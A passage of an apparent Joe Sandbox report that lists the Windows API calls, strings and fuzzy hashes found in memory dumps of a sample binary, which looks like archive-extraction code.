                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d630589207c6d4b1e4b5f89c344db2fdacf94777acbdc4e1d057c54d31c95c14
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: d630589207c6d4b1e4b5f89c344db2fdacf94777acbdc4e1d057c54d31c95c14
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DBD5
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 22de15e310106a2592fa8d0853264a3e5bbc2f0dd6123348af38db9be4aab0be
                  • Instruction ID: 436f71f4c0abd78371fa378e4796933ff36591cb9f02966682fba77e1c0f1005
                  • Opcode Fuzzy Hash: 22de15e310106a2592fa8d0853264a3e5bbc2f0dd6123348af38db9be4aab0be
                  • Instruction Fuzzy Hash: F4A011AB2BC00BBCB00822803E0BCBA033CE8C0B203328C2ABA0A800C0AA800C080830
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b07759e1d0d67c2ff6ca4f4982990c68500fd48a4d4a81ffd40ccf2eaa200e19
                  • Instruction ID: 9da5b79a53e026b956958802d7226600a9d4a89c5eda7c6eca1864b3a6b601bc
                  • Opcode Fuzzy Hash: b07759e1d0d67c2ff6ca4f4982990c68500fd48a4d4a81ffd40ccf2eaa200e19
                  • Instruction Fuzzy Hash: DEA002B757D117BD710C61957E16D76032CD4C4B513358D19B506940D555C05C455431
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00A0DC36
                    • Part of subcall function 00A0DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0DFD6
                    • Part of subcall function 00A0DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2e84ed0034dc305ca1dfb89a3be8399dfc71027a48246ad4ddb5af2d27796c8
                  • Instruction ID: 9da5b79a53e026b956958802d7226600a9d4a89c5eda7c6eca1864b3a6b601bc
                  • Opcode Fuzzy Hash: d2e84ed0034dc305ca1dfb89a3be8399dfc71027a48246ad4ddb5af2d27796c8
                  • Instruction Fuzzy Hash: DEA002B757D117BD710C61957E16D76032CD4C4B513358D19B506940D555C05C455431
                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,00A0A587,C:\Users\user\Desktop,00000000,00A3946A,00000006), ref: 00A0A326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  • Opcode ID: 954668417c0d9115175c7ea7af78046dc55d56dc4a25ee209eead30d62256f77
                  • Instruction ID: e9cb18b9b806d79168899a7ff968161c8d2dc35b4404c01a0b9dbcd31043e1bb
                  • Opcode Fuzzy Hash: 954668417c0d9115175c7ea7af78046dc55d56dc4a25ee209eead30d62256f77
                  • Instruction Fuzzy Hash: 2FA01231194006568E104B34CC09C2576505761702F0087307002C00A0CB308825A500
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A0B971
                  • EndDialog.USER32(?,00000006), ref: 00A0B984
                  • GetDlgItem.USER32(?,0000006C), ref: 00A0B9A0
                  • SetFocus.USER32(00000000), ref: 00A0B9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A0B9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A0BA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 00A0BA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A0BA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A0BA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A0BA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A0BA94
                  • _swprintf.LIBCMT ref: 00A0BAC4
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A0BAD7
                  • FindClose.KERNEL32(00000000), ref: 00A0BADE
                  • _swprintf.LIBCMT ref: 00A0BB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A0BB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A0BB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A0BB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A0BB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A0BBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A0BBC9
                  • _swprintf.LIBCMT ref: 00A0BBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A0BC08
                  • _swprintf.LIBCMT ref: 00A0BC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A0BC6F
                    • Part of subcall function 00A0A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A0A662
                    • Part of subcall function 00A0A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A2E600,?,?), ref: 00A0A6B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  • Opcode ID: 448b44498fff1aa66ac341ee11ce9e68d0cdfdc2b70b84732fc86d260868068f
                  • Instruction ID: 14ffce51cd044e0fb4ab9d29841016a10d940d93712553f0d2cee42a6eee5a98
                  • Opcode Fuzzy Hash: 448b44498fff1aa66ac341ee11ce9e68d0cdfdc2b70b84732fc86d260868068f
                  • Instruction Fuzzy Hash: C091B372148348BBD631DBA4DD49FFB77ACFB8A701F040929B749D2081DB759A058B72
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F7191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 009F72F1
                  • CloseHandle.KERNEL32(00000000), ref: 009F7301
                    • Part of subcall function 009F7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 009F7C04
                    • Part of subcall function 009F7BF5: GetLastError.KERNEL32 ref: 009F7C4A
                    • Part of subcall function 009F7BF5: CloseHandle.KERNEL32(?), ref: 009F7C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 009F730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 009F741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 009F7446
                  • CloseHandle.KERNEL32(?), ref: 009F7457
                  • GetLastError.KERNEL32 ref: 009F7467
                  • RemoveDirectoryW.KERNEL32(?), ref: 009F74B3
                  • DeleteFileW.KERNEL32(?), ref: 009F74DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  • Opcode ID: 9670f74b1a209a2778013b223c92ba3451df2954ce1e23051715f13e10614c8a
                  • Instruction ID: b74a219fca023093bcc1699b31ce24d09f16b0bbc77dfb00151e0bf8650c6087
                  • Opcode Fuzzy Hash: 9670f74b1a209a2778013b223c92ba3451df2954ce1e23051715f13e10614c8a
                  • Instruction Fuzzy Hash: E4B1E171904219ABDF20DFA4DC41FFEB7B8AF44304F0444A9FA49E7192D774AA49CBA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  • Opcode ID: 95503b04b5bed3af9c3b79571e699901111a7dee1cee1009935e7598bad998cc
                  • Instruction ID: 19cffdbf3306852169340525f86ab79abd5b4f4afff859235e9a2c109105c993
                  • Opcode Fuzzy Hash: 95503b04b5bed3af9c3b79571e699901111a7dee1cee1009935e7598bad998cc
                  • Instruction Fuzzy Hash: 8E32927151428C9BDF14DF64C985BFA37A9AF54300F44857EFE8ACB282DB74A948CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: f81796501c5ad1485d451c3fa238a15bc39c8ea17f722b53abbfbfc6e162612c
                  • Instruction ID: 0522f3c95bd32b3d502a71f7d8e6df5dde7d9d45a8b24f473a9e7090884519f7
                  • Opcode Fuzzy Hash: f81796501c5ad1485d451c3fa238a15bc39c8ea17f722b53abbfbfc6e162612c
                  • Instruction Fuzzy Hash: 4CC21971E086288FDB25CF289D407EAB7B5EB88315F1545EAD85EE7240E774AEC18F40
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F27F1
                  • _strlen.LIBCMT ref: 009F2D7F
                    • Part of subcall function 00A0137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009FB652,00000000,?,?,?,0001042A), ref: 00A01396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F2EE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  • Opcode ID: f7a4aeeb869f6ae45047f77d5e34fb8d989772a430b038c9bfe01627d6c24025
                  • Instruction ID: d8eaa70d4e52ce1a332ea0ce85c4c9809d7349661f443ea4778ae0bcbf17ac82
                  • Opcode Fuzzy Hash: f7a4aeeb869f6ae45047f77d5e34fb8d989772a430b038c9bfe01627d6c24025
                  • Instruction Fuzzy Hash: 3562E2716042488FDF18DF38C9957FA3BE5AF54304F08857EEE9A8B282DB74A945CB50
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A18767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A18771
                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00A1877E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: c77ca8d553f52a609bfb4237a50cfec3cf411ea167f3e85d7fbbcc7322229867
                  • Instruction ID: c86de25187df60329dc772cdb922e3be5478e3816cb9866af7524c50144409c9
                  • Opcode Fuzzy Hash: c77ca8d553f52a609bfb4237a50cfec3cf411ea167f3e85d7fbbcc7322229867
                  • Instruction Fuzzy Hash: F531B575D0122C9BCB21DF68D989BDCB7B4BF18310F5041EAE81CA7291EB349B858F45
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction ID: ef3d6e8246e1b71034f5ac2318a2b8008135689c150d88ff1104c5afe5004757
                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction Fuzzy Hash: 75022C71E402199FDF14CFA9D9806EDBBF1EF88324F25816AD919E7384D731AA418B84
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A0A662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,00A2E600,?,?), ref: 00A0A6B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  • Opcode ID: 9bb4a5a1e1331b7f1a30f9dafebac7218c46f462f12a4b7ee7d5fd7783399b43
                  • Instruction ID: 39e5308b2ca6cb85fec3a4bf0330c3dc689df3bc7aee17e6d0386446ab4b1e30
                  • Opcode Fuzzy Hash: 9bb4a5a1e1331b7f1a30f9dafebac7218c46f462f12a4b7ee7d5fd7783399b43
                  • Instruction Fuzzy Hash: 2F015E3A100208BADB20CFA8EC45FAB77BCFF59710F004522BA04A7190D3719A668BE5
                  APIs
                  • GetLastError.KERNEL32(00A0117C,?,00000200), ref: 009F6EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 009F6EEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 250aff5024a5fdc90f4144d73b0c6eae7ff99bc4899ba55ba1be47d22cbcac3a
                  • Instruction ID: 0779988989806050c993efde72f2fdcd71f2c69bd32af8f261be5339c98bf796
                  • Opcode Fuzzy Hash: 250aff5024a5fdc90f4144d73b0c6eae7ff99bc4899ba55ba1be47d22cbcac3a
                  • Instruction Fuzzy Hash: 43D0C7373D8306BFEE214A78CC05F377B546756B42F108524B357D94D0C57490269729
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A2118F,?,?,00000008,?,?,00A20E2F,00000000), ref: 00A213C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: 0eef6e3f240827fe10f05995e4ae1effb3637fef102b1ac442d2804a1a91779d
                  • Instruction ID: 5c61c0365575d77416b0ecbb714cc394cdd72b7ef396adc409d43e1ad3013c1a
                  • Opcode Fuzzy Hash: 0eef6e3f240827fe10f05995e4ae1effb3637fef102b1ac442d2804a1a91779d
                  • Instruction Fuzzy Hash: 8FB17B71610618CFD719CF2CD48ABA57BE1FF15364F298668E899CF2A1C335E982CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  • Opcode ID: 9cf42ec2ad5741e2bf0806e2ffdbc0bba4d03e930373e7d42ec1ede04b4a4080
                  • Instruction ID: e46ab5c969c649ec34b1b36263d5dcd56b6243b10e6758f792b0ada78e40044c
                  • Opcode Fuzzy Hash: 9cf42ec2ad5741e2bf0806e2ffdbc0bba4d03e930373e7d42ec1ede04b4a4080
                  • Instruction Fuzzy Hash: F8F1C2B2A083418FD748CF29D880A1BFBE1BFC8208F15892EF598D7711E774E9558B56
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 009FAD1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                   • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
